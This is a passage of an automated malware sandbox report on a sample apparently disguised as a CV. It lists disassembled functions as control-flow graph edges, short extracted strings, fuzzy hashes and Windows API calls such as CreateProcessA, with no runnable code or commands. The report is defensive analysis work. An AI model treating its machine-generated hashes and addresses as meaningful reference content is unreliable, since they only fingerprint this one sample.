1342 751077b-75107c0 1342->1291 1342->1305 1343->1330 1343->1335 1343->1336 1343->1337 1343->1338 1343->1339 1343->1340 1344->1335 1344->1340 1347 7510a5f-7510a71 1347->1341 1363 7510a3c-7510a51 1361->1363 1364 7510a24-7510a2a 1362->1364 1365 7510a1c-7510a22 1362->1365 1363->1341 1367 7510a34 1364->1367 1365->1367 1367->1363 1369 7510b6c-7510b7e call 75165d0 1370 7510b84-7510b96 1369->1370 1373->1342 1374->1342 1377->1347 1378->1347 1380->1369 1381->1369
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$5$z-,
                                    • API String ID: 0-1338410118
                                    • Opcode ID: 38de786e4e23b2367340f708f8681eaa4f882be096cac1fe772e2de042f267f3
                                    • Instruction ID: 7049cb533bd43c48da56ad8338d582097c81647e523ca4845445420e9f20fec1
                                    • Opcode Fuzzy Hash: 38de786e4e23b2367340f708f8681eaa4f882be096cac1fe772e2de042f267f3
                                    • Instruction Fuzzy Hash: 6002F2B4E05218CFEB14CFA9D9957DDBBB2BF89301F10946AD40ABB294DB349981CF14
                                    Function 075108B3 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1429 75108b3-7510933 call 7512f08 1435 7510935-7510941 1429->1435 1436 751095d 1429->1436 1437 7510943-7510949 1435->1437 1438 751094b-7510951 1435->1438 1439 7510963 1436->1439 1441 751095b 1437->1441 1438->1441 1440 7510966 1439->1440 1442 751096d-7510989 1440->1442 1441->1439 1443 751098b 1442->1443 1444 751099e-751099f 1442->1444 1443->1440 1445 7510bb3-7510bba 1443->1445 1446 75109a4-7510a0c 1443->1446 1447 7510a76-7510ab0 call 7514fab call 7515b00 1443->1447 1448 7510a56-7510a57 1443->1448 1449 7510b9b-7510bae 1443->1449 1450 7510adc-7510b63 call 7512f08 1443->1450 1444->1445 1444->1446 1463 7510a36 1446->1463 1464 7510a0e-7510a1a 1446->1464 1459 7510ab6-7510ad7 1447->1459 1474 7510a59 call 7891fd8 1448->1474 1475 7510a59 call 7891fe8 1448->1475 1476 7510b66 call 751130b 1450->1476 1477 7510b66 call 751124b 1450->1477 1452 7510a5f-7510a71 1452->1442 1468 7510a3c-7510a51 1463->1468 1465 7510a24-7510a2a 1464->1465 1466 7510a1c-7510a22 1464->1466 1469 7510a34 1465->1469 1466->1469 1468->1442 1469->1468 1471 7510b6c-7510b7e call 75165d0 1472 7510b84-7510b96 1471->1472 1474->1452 1475->1452 1476->1471 1477->1471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$$q$$q
                                    • API String ID: 0-3067366958
                                    • Opcode ID: fc85e6ec2bb7d625572324ab3a22857de46e2e9c8fa691c6e4048a3964ba88a1
                                    • Instruction ID: 0c07bd4302bb46fb28cfe9b1a66cc7b88759866b5fe9aa5ff6a53214f7c52de2
                                    • Opcode Fuzzy Hash: fc85e6ec2bb7d625572324ab3a22857de46e2e9c8fa691c6e4048a3964ba88a1
                                    • Instruction Fuzzy Hash: C581B074E05318CFEB64DFA5D954B9DBBB2BB89301F1081AAD40AAB355DB345E81CF10
                                    Function 02CD783E Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1520 2cd783e-2cd7844 1521 2cd7846-2cd78b4 1520->1521 1522 2cd78c0-2cd78c5 1520->1522 1527 2cd7dfc-2cd7e15 1521->1527 1528 2cd78ba-2cd78bf 1521->1528 1526 2cd78ca-2cd7a25 1522->1526 1652 2cd7a5f-2cd7a61 1526->1652 1653 2cd7a27-2cd7a5d 1526->1653 1531 2cd7e8e-2cd7ed9 1527->1531 1532 2cd7e17-2cd7e3d 1527->1532 1528->1526 1542 2cd7edb-2cd7ee1 1531->1542 1543 2cd7ee6-2cd7eee 1531->1543 1538 2cd846a-2cd8497 1532->1538 1539 2cd7e43-2cd7e4e 1532->1539 1556 2cd8499-2cd84a1 1538->1556 1557 2cd84b1-2cd84d7 1538->1557 1539->1538 1541 2cd7e54-2cd7e6c 1539->1541 1541->1538 1546 2cd7e72-2cd7e8d call 2cd0210 1541->1546 1547 2cd7f79-2cd7fc2 1542->1547 1548 2cd7f11 1543->1548 1549 2cd7ef0-2cd7f0f 1543->1549 1561 2cd803f-2cd80a0 1547->1561 1562 2cd7fc4-2cd7ff0 1547->1562 1552 2cd7f18-2cd7f1a 1548->1552 1549->1552 1559 2cd7f1c-2cd7f1e 1552->1559 1560 2cd7f20-2cd7f26 1552->1560 1556->1557 1563 2cd84a3-2cd84b0 1556->1563 1568 2cd84d9-2cd84e9 1557->1568 1569 2cd8517-2cd852f 1557->1569 1559->1547 1566 2cd7f2e-2cd7f36 1560->1566 1711 2cd80a2 call 2cd9760 1561->1711 1712 2cd80a2 call 2cd9730 1561->1712 1562->1538 1573 2cd7ff6-2cd7ffd 1562->1573 1566->1547 1571 2cd7f38-2cd7f3b 1566->1571 1586 2cd84eb-2cd84ff 1568->1586 1587 2cd8506-2cd850d 1568->1587 1584 2cd854c-2cd8550 1569->1584 1585 2cd8531-2cd8545 1569->1585 1570 2cd80a8-2cd80b9 1570->1538 1574 2cd80bf-2cd80e8 1570->1574 1575 2cd7f41-2cd7f49 1571->1575 1573->1538 1577 2cd8003-2cd800f 1573->1577 1574->1538 1580 2cd80ee-2cd80fb 1574->1580 1575->1538 1581 2cd7f4f-2cd7f77 1575->1581 1577->1538 1583 2cd8015-2cd8021 1577->1583 1580->1538 1582 2cd8101-2cd811d 1580->1582 1581->1547 1581->1575 1588 2cd819f-2cd81c9 1582->1588 1589 2cd8123-2cd8129 1582->1589 1583->1538 1593 2cd8027-2cd8037 1583->1593 1584->1569 1594 2cd8552-2cd8556 1584->1594 1585->1584 1586->1587 1591 2cd850f-2cd8516 1587->1591 1592 2cd8557-2cd85c2 1587->1592 1597 2cd81cb-2cd81cf 1588->1597 1598 2cd8221-2cd8233 1588->1598 1595 2cd8158-2cd816a 1589->1595 1596 2cd812b-2cd8152 1589->1596 1593->1561 1595->1538 1602 2cd8170-2cd8189 1595->1602 1596->1595 1597->1598 1604 2cd81d1 1597->1604 1605 2cd823c-2cd8240 1598->1605 1606 2cd8235-2cd823a 1598->1606 1602->1538 1610 2cd818f-2cd819d 1602->1610 1611 2cd81d6-2cd81e4 1604->1611 1605->1538 1607 2cd8246-2cd824e 1605->1607 1613 2cd82a2-2cd82a9 1606->1613 1607->1538 1614 2cd8254-2cd8261 1607->1614 1610->1588 1610->1589 1611->1538 1619 2cd81ea-2cd81ff 1611->1619 1616 2cd82ab-2cd82bd 1613->1616 1617 2cd8315-2cd8335 1613->1617 1614->1538 1620 2cd8267-2cd8274 1614->1620 1616->1617 1621 2cd82bf-2cd82d7 1616->1621 1634 2cd8338-2cd8363 1617->1634 1619->1538 1622 2cd8205-2cd8212 1619->1622 1620->1538 1623 2cd827a-2cd8297 1620->1623 1631 2cd82d9 1621->1631 1632 2cd8303-2cd8313 call 2cd0210 1621->1632 1622->1538 1626 2cd8218-2cd821f 1622->1626 1623->1613 1626->1598 1626->1611 1635 2cd82dc-2cd82de 1631->1635 1632->1634 1637 2cd83ed-2cd8400 1634->1637 1638 2cd8369-2cd83ea 1634->1638 1635->1538 1640 2cd82e4-2cd82f2 1635->1640 1641 2cd845f-2cd8469 1637->1641 1642 2cd8402-2cd843b 1637->1642 1638->1637 1640->1538 1643 2cd82f8-2cd8301 1640->1643 1642->1641 1658 2cd843d-2cd8459 1642->1658 1643->1632 1643->1635 1656 2cd7a67-2cd7a71 1652->1656 1657 2cd7a63-2cd7a65 1652->1657 1653->1652 1660 2cd7a73-2cd7a89 1656->1660 1657->1660 1658->1641 1663 2cd7a8f-2cd7a97 1660->1663 1664 2cd7a8b-2cd7a8d 1660->1664 1667 2cd7a99-2cd7a9e 1663->1667 1664->1667 1668 2cd7ab1-2cd7ad8 1667->1668 1669 2cd7aa0-2cd7aab 1667->1669 1673 2cd7b0c-2cd7b16 1668->1673 1674 2cd7ada-2cd7ae6 1668->1674 1669->1668 1676 2cd7b1f-2cd7ba7 1673->1676 1677 2cd7b18 1673->1677 1674->1673 1675 2cd7ae8-2cd7af5 1674->1675 1680 2cd7afb-2cd7b06 1675->1680 1681 2cd7af7-2cd7af9 1675->1681 1687 2cd7ba9-2cd7be5 1676->1687 1688 2cd7be7-2cd7bf5 1676->1688 1677->1676 1680->1673 1681->1673 1691 2cd7c00-2cd7c37 1687->1691 1688->1691 1708 2cd7c3d call 2cd8961 1691->1708 1709 2cd7c3d call 2cd88c0 1691->1709 1710 2cd7c3d call 2cd88b2 1691->1710 1695 2cd7c43-2cd7cd0 1700 2cd7cfe-2cd7d1a 1695->1700 1701 2cd7cd2-2cd7cfc 1695->1701 1703 2cd7d1c 1700->1703 1704 2cd7d28-2cd7d29 1700->1704 1701->1700 1703->1704 1704->1527 1708->1695 1709->1695 1710->1695 1711->1570 1712->1570
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRq$\sq
                                    • API String ID: 0-576302416
                                    • Opcode ID: b947eee76279bd11ca8765949d99059edb1d1edb2ea123e0f4837be879c03117
                                    • Instruction ID: b31ac62ed08b30e18871284393346b20e54b588734c43f74daae09ddbf313c29
                                    • Opcode Fuzzy Hash: b947eee76279bd11ca8765949d99059edb1d1edb2ea123e0f4837be879c03117
                                    • Instruction Fuzzy Hash: 42D18D75E412298FDB14DF79D884AAEBBF2BFC8300F558569D405EB354DB30AA058B90
                                    Function 02CD788A Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1713 2cd788a-2cd78a0 1715 2cd78ad-2cd78b4 1713->1715 1716 2cd78a2-2cd78ac 1713->1716 1717 2cd7dfc-2cd7e15 1715->1717 1718 2cd78ba-2cd7a25 1715->1718 1720 2cd7e8e-2cd7ed9 1717->1720 1721 2cd7e17-2cd7e3d 1717->1721 1848 2cd7a5f-2cd7a61 1718->1848 1849 2cd7a27-2cd7a5d 1718->1849 1731 2cd7edb-2cd7ee1 1720->1731 1732 2cd7ee6-2cd7eee 1720->1732 1726 2cd846a-2cd8497 1721->1726 1727 2cd7e43-2cd7e4e 1721->1727 1744 2cd8499-2cd84a1 1726->1744 1745 2cd84b1-2cd84d7 1726->1745 1727->1726 1730 2cd7e54-2cd7e6c 1727->1730 1730->1726 1734 2cd7e72-2cd7e8d call 2cd0210 1730->1734 1735 2cd7f79-2cd7fc2 1731->1735 1736 2cd7f11 1732->1736 1737 2cd7ef0-2cd7f0f 1732->1737 1750 2cd803f-2cd80a0 1735->1750 1751 2cd7fc4-2cd7ff0 1735->1751 1741 2cd7f18-2cd7f1a 1736->1741 1737->1741 1748 2cd7f1c-2cd7f1e 1741->1748 1749 2cd7f20-2cd7f26 1741->1749 1744->1745 1752 2cd84a3-2cd84b0 1744->1752 1757 2cd84d9-2cd84e9 1745->1757 1758 2cd8517-2cd852f 1745->1758 1748->1735 1755 2cd7f2e-2cd7f36 1749->1755 1902 2cd80a2 call 2cd9760 1750->1902 1903 2cd80a2 call 2cd9730 1750->1903 1751->1726 1761 2cd7ff6-2cd7ffd 1751->1761 1755->1735 1760 2cd7f38-2cd7f3b 1755->1760 1774 2cd84eb-2cd84ff 1757->1774 1775 2cd8506-2cd850d 1757->1775 1772 2cd854c-2cd8550 1758->1772 1773 2cd8531-2cd8545 1758->1773 1759 2cd80a8-2cd80b9 1759->1726 1763 2cd80bf-2cd80e8 1759->1763 1764 2cd7f41-2cd7f49 1760->1764 1761->1726 1765 2cd8003-2cd800f 1761->1765 1763->1726 1768 2cd80ee-2cd80fb 1763->1768 1764->1726 1769 2cd7f4f-2cd7f77 1764->1769 1765->1726 1771 2cd8015-2cd8021 1765->1771 1768->1726 1770 2cd8101-2cd811d 1768->1770 1769->1735 1769->1764 1777 2cd819f-2cd81c9 1770->1777 1778 2cd8123-2cd8129 1770->1778 1771->1726 1781 2cd8027-2cd8037 1771->1781 1772->1758 1782 2cd8552-2cd8556 1772->1782 1773->1772 1774->1775 1779 2cd850f-2cd8516 1775->1779 1780 2cd8557-2cd85c2 1775->1780 1785 2cd81cb-2cd81cf 1777->1785 1786 2cd8221-2cd8233 1777->1786 1783 2cd8158-2cd816a 1778->1783 1784 2cd812b-2cd8152 1778->1784 1781->1750 1783->1726 1791 2cd8170-2cd8189 1783->1791 1784->1783 1785->1786 1792 2cd81d1 1785->1792 1793 2cd823c-2cd8240 1786->1793 1794 2cd8235-2cd823a 1786->1794 1791->1726 1799 2cd818f-2cd819d 1791->1799 1800 2cd81d6-2cd81e4 1792->1800 1793->1726 1795 2cd8246-2cd824e 1793->1795 1802 2cd82a2-2cd82a9 1794->1802 1795->1726 1803 2cd8254-2cd8261 1795->1803 1799->1777 1799->1778 1800->1726 1807 2cd81ea-2cd81ff 1800->1807 1804 2cd82ab-2cd82bd 1802->1804 1805 2cd8315-2cd8335 1802->1805 1803->1726 1808 2cd8267-2cd8274 1803->1808 1804->1805 1810 2cd82bf-2cd82d7 1804->1810 1823 2cd8338-2cd8363 1805->1823 1807->1726 1811 2cd8205-2cd8212 1807->1811 1808->1726 1812 2cd827a-2cd8297 1808->1812 1819 2cd82d9 1810->1819 1820 2cd8303-2cd8313 call 2cd0210 1810->1820 1811->1726 1814 2cd8218-2cd821f 1811->1814 1812->1802 1814->1786 1814->1800 1824 2cd82dc-2cd82de 1819->1824 1820->1823 1826 2cd83ed-2cd8400 1823->1826 1827 2cd8369-2cd83ea 1823->1827 1824->1726 1828 2cd82e4-2cd82f2 1824->1828 1829 2cd845f-2cd8469 1826->1829 1830 2cd8402-2cd843b 1826->1830 1827->1826 1828->1726 1832 2cd82f8-2cd8301 1828->1832 1830->1829 1843 2cd843d-2cd8459 1830->1843 1832->1820 1832->1824 1843->1829 1850 2cd7a67-2cd7a71 1848->1850 1851 2cd7a63-2cd7a65 1848->1851 1849->1848 1853 2cd7a73-2cd7a89 1850->1853 1851->1853 1855 2cd7a8f-2cd7a97 1853->1855 1856 2cd7a8b-2cd7a8d 1853->1856 1858 2cd7a99-2cd7a9e 1855->1858 1856->1858 1859 2cd7ab1-2cd7ad8 1858->1859 1860 2cd7aa0-2cd7aab 1858->1860 1864 2cd7b0c-2cd7b16 1859->1864 1865 2cd7ada-2cd7ae6 1859->1865 1860->1859 1867 2cd7b1f-2cd7ba7 1864->1867 1868 2cd7b18 1864->1868 1865->1864 1866 2cd7ae8-2cd7af5 1865->1866 1871 2cd7afb-2cd7b06 1866->1871 1872 2cd7af7-2cd7af9 1866->1872 1878 2cd7ba9-2cd7be5 1867->1878 1879 2cd7be7-2cd7bf5 1867->1879 1868->1867 1871->1864 1872->1864 1882 2cd7c00-2cd7c37 1878->1882 1879->1882 1899 2cd7c3d call 2cd8961 1882->1899 1900 2cd7c3d call 2cd88c0 1882->1900 1901 2cd7c3d call 2cd88b2 1882->1901 1886 2cd7c43-2cd7cd0 1891 2cd7cfe-2cd7d1a 1886->1891 1892 2cd7cd2-2cd7cfc 1886->1892 1894 2cd7d1c 1891->1894 1895 2cd7d28-2cd7d29 1891->1895 1892->1891 1894->1895 1895->1717 1899->1886 1900->1886 1901->1886 1902->1759 1903->1759
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRq$\sq
                                    • API String ID: 0-576302416
                                    • Opcode ID: fc79b6ec4adc07c82dc39bca6b0c4e0fb25351328d874627ae2d2f8bd778dfb5
                                    • Instruction ID: 64e5233a9d2042f731c21df35771b1b59281ffc3df59043972ccc333aee08e98
                                    • Opcode Fuzzy Hash: fc79b6ec4adc07c82dc39bca6b0c4e0fb25351328d874627ae2d2f8bd778dfb5
                                    • Instruction Fuzzy Hash: 3CC18D75E412298FDB14DF79D884AAEB7F2BFC8300F558569E406EB345DB30AA05CB90
                                    Function 07515B00 Relevance: 2.8, Strings: 2, Instructions: 268COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1904 7515b00-7515b38 1905 7515b3a 1904->1905 1906 7515b3f-7515b7f 1904->1906 1905->1906 1907 7515b80 1906->1907 1908 7515b87-7515ba3 1907->1908 1909 7515ba5 1908->1909 1910 7515bac-7515bad 1908->1910 1909->1907 1909->1910 1911 7515c10-7515c27 1909->1911 1912 7515bb2-7515bb6 1909->1912 1913 7515e52-7515e69 1909->1913 1914 7515c97-7515caa 1909->1914 1915 7515e37-7515e4d 1909->1915 1916 7515bf6-7515c0b 1909->1916 1917 7515dd9-7515de2 1909->1917 1918 7515c60-7515c64 1909->1918 1919 7515dc2-7515dd4 1909->1919 1920 7515d45-7515d6c call 75155f8 1909->1920 1921 7515e85-7515e8e 1909->1921 1922 7515c44-7515c5b 1909->1922 1923 7515de7-7515e32 call 75152c8 1909->1923 1924 7515be6-7515bf4 1909->1924 1925 7515da8-7515dbd 1909->1925 1926 7515ccd-7515d28 1909->1926 1927 7515d2d-7515d40 1909->1927 1928 7515c2c-7515c3f 1909->1928 1929 7515caf-7515cc8 1909->1929 1930 7515e6e-7515e80 1909->1930 1910->1921 1911->1908 1931 7515bc9-7515bd0 1912->1931 1932 7515bb8-7515bc7 1912->1932 1913->1908 1914->1908 1915->1908 1916->1908 1917->1908 1934 7515c77-7515c7e 1918->1934 1935 7515c66-7515c75 1918->1935 1919->1908 1948 7515d6f call 7515f20 1920->1948 1949 7515d6f call 7515f13 1920->1949 1922->1908 1923->1908 1924->1908 1925->1908 1926->1908 1927->1908 1928->1908 1929->1908 1930->1908 1939 7515bd7-7515be4 1931->1939 1932->1939 1937 7515c85-7515c92 1934->1937 1935->1937 1937->1908 1939->1908 1945 7515d75-7515da3 1945->1908 1948->1945 1949->1945
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: UJ$yO6
                                    • API String ID: 0-870398751
                                    • Opcode ID: c6249657f2c34e4c48a4ca3b083dc87ffd8e0034c5f9a42803aa7564887cf624
                                    • Instruction ID: 078c4d2ec5786d0627121bf5f5774999e48eb63c99e353dff72cc9bcf21f5123
                                    • Opcode Fuzzy Hash: c6249657f2c34e4c48a4ca3b083dc87ffd8e0034c5f9a42803aa7564887cf624
                                    • Instruction Fuzzy Hash: 8EB136B0E14219DFDB18CFA6D9805DEFBB2FF89314F14952AD016AB224EB349916CF40
                                    Function 07514FAB Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !>c8$%)Y
                                    • API String ID: 0-2922296349
                                    • Opcode ID: b69fa3649700987e279cf9d103d40c9030af194c8b9afae7eee8fed1eed7228e
                                    • Instruction ID: 6491d63922753ec2c8fa65afe3cbc7ecd3ea66df75877e6a45ef0455c1c88c83
                                    • Opcode Fuzzy Hash: b69fa3649700987e279cf9d103d40c9030af194c8b9afae7eee8fed1eed7228e
                                    • Instruction Fuzzy Hash: 4F9134B1D14209EFDB08CFE6E5818DEFBB2BF89311F14942AE015AB224E7318952CF41
                                    Function 02CD7510 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \sq
                                    • API String ID: 0-1116441132
                                    • Opcode ID: 77c022ffbde6cd9d74f659d874de080c957b3ca9d662405cbbfee47dd8d0a0c0
                                    • Instruction ID: 412a452c7114aa29f1a13edf51af5d55a14b1ba92d23a722a1162d2057ec5715
                                    • Opcode Fuzzy Hash: 77c022ffbde6cd9d74f659d874de080c957b3ca9d662405cbbfee47dd8d0a0c0
                                    • Instruction Fuzzy Hash: 578109B8E4010E9FDF14CFAAD485ABDBBB1BF88304F10A659D412EB250DB359A45CF51
                                    Function 02CD8BE8 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 1efc3f24de93929c1c6b58f8132805ad2280efdb10da650722a9591c8a2e1d17
                                    • Instruction ID: 8c2991601e4e42eb74d2bb8b5ae26a06203a8ab2decaedb4d3c181b45718b962
                                    • Opcode Fuzzy Hash: 1efc3f24de93929c1c6b58f8132805ad2280efdb10da650722a9591c8a2e1d17
                                    • Instruction Fuzzy Hash: 50519071B001158FCB14DF69D8846AEBBF2FFC8215B558679E609CB784DB31EC428B90
                                    Function 07510840 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q
                                    • API String ID: 0-1301096350
                                    • Opcode ID: 7c8ceaf5d49dced48055903f41ecb40a9850e639f3ba07e099cd9ae2422e0c8f
                                    • Instruction ID: 15c0d7ba2fe740c54165760294e92112b1ea70f9019749b9f2f2eeec3c5eea9d
                                    • Opcode Fuzzy Hash: 7c8ceaf5d49dced48055903f41ecb40a9850e639f3ba07e099cd9ae2422e0c8f
                                    • Instruction Fuzzy Hash: 4F710374E05218CFEB24DFA4D954B9DBBB2FB88301F1085AAD40ABB394DB349981CF54
                                    Function 0751082B Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q
                                    • API String ID: 0-1301096350
                                    • Opcode ID: 6a5e2a2924dbacd27b60d7f4d293817b4fc7a25630bfe3c98f94c19cf60ac6ee
                                    • Instruction ID: e07218ad69a01b1170e4691f66542e09fca79e680fb08b0e18fc0c9437cec45b
                                    • Opcode Fuzzy Hash: 6a5e2a2924dbacd27b60d7f4d293817b4fc7a25630bfe3c98f94c19cf60ac6ee
                                    • Instruction Fuzzy Hash: 1371E374E05258CFEB64DFA4D954B9DBBB2FB88301F1085AAD40AAB394DB349981CF14
                                    Function 02CD88C0 Relevance: .2, Instructions: 235COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9a886dd0caf0729c4c51b4c3263c64d17acea757918c7b213abb550bc3aef91
                                    • Instruction ID: b48e56bd6c8b29d51ab8cf1b2901121907ddb3487171ced420b4348a3b2b03ff
                                    • Opcode Fuzzy Hash: e9a886dd0caf0729c4c51b4c3263c64d17acea757918c7b213abb550bc3aef91
                                    • Instruction Fuzzy Hash: AB813872F106249FD714DB69D884B6EB7A3AFC8710F1A8165E509EB359DE74EC028B80
                                    Function 02CD8961 Relevance: .2, Instructions: 188COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 064240d051f0b57b8507eb54c58670042a66970582f005a265dbf5f36c3089b9
                                    • Instruction ID: 10e294fd6d0f6aaadcdb7f9c13097c1613dc0f70a6c628f9b474b744acafc3da
                                    • Opcode Fuzzy Hash: 064240d051f0b57b8507eb54c58670042a66970582f005a265dbf5f36c3089b9
                                    • Instruction Fuzzy Hash: 6C612E72F206249FD754DB69CC84B5EB7E3AFC8710F1A8165E4099B35ADE74EC028B80
                                    Function 05E443C5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1506 5e443c5-5e44436 1507 5e44441-5e44448 1506->1507 1508 5e44438-5e4443e 1506->1508 1509 5e44453-5e4448b 1507->1509 1510 5e4444a-5e44450 1507->1510 1508->1507 1511 5e44493-5e444f2 CreateWindowExW 1509->1511 1510->1509 1512 5e444f4-5e444fa 1511->1512 1513 5e444fb-5e44533 1511->1513 1512->1513 1517 5e44535-5e44538 1513->1517 1518 5e44540 1513->1518 1517->1518 1519 5e44541 1518->1519 1519->1519
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E444E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID: W
                                    • API String ID: 716092398-655174618
                                    • Opcode ID: 02763853e4129d0240d54bedabcbbc5e760643d4da409d111d82468429899d5d
                                    • Instruction ID: bd2e0b2206da7d46ef4ca2e0bd009b5c206e8f5c7d3ae5ece3f6176f465c01a9
                                    • Opcode Fuzzy Hash: 02763853e4129d0240d54bedabcbbc5e760643d4da409d111d82468429899d5d
                                    • Instruction Fuzzy Hash: 8C51DEB1D10349DFDF14CFAAD884ADEBBB1BF48310F64812AE859AB250D7759845CF90
                                    Function 07890007 Relevance: 1.8, APIs: 1, Instructions: 270processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07890276
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 105d37491a8d134fac1eae50aeba5e6f3104eb4a280f70d4853d9bd5318fb0c0
                                    • Instruction ID: 1cb8e3bb4131c4f1fe4f9f1d22aff1660f2bc82f4ca5f06902ab65b0f2fafe7e
                                    • Opcode Fuzzy Hash: 105d37491a8d134fac1eae50aeba5e6f3104eb4a280f70d4853d9bd5318fb0c0
                                    • Instruction Fuzzy Hash: 0EA14AB1D0135ACFDF25DF68C8417DEBBB2AB49310F1881A9E848E7240DB759985CF91
                                    Function 07890040 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07890276
                                    Memory Dump Source
